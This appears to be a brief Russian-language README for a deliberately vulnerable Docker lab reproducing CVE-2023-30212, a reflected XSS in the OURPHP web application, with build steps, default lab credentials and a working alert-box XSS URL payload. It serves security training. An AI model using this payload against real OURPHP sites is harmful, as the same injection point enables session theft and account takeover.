
Docker-среда с уязвимостями для отработки эксплуатации CVE-2023-30212, включающая веб-приложение OURPHP с уязвимостью отражённого XSS для обучения безопасности.
git clone https://github.com/JasaluRah/Creating-a-Vulnerable-Docker-Environment-CVE-2023-30212-.git
теперь для настройки docker-образа
используйте команду sudo docker build -t work .
используйте команду sudo docker run -d -p 80:80 work
теперь мы получим id контейнера
перейдите в браузер и введите localhost; 127.0.0.1
теперь используйте учетные данные
имя пользователя : root
пароль : docker
база данных : work
имя пользователя : work пароль : work
перейдите по URL http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("xss")</script>
мы получим уведомление с сообщением "xss".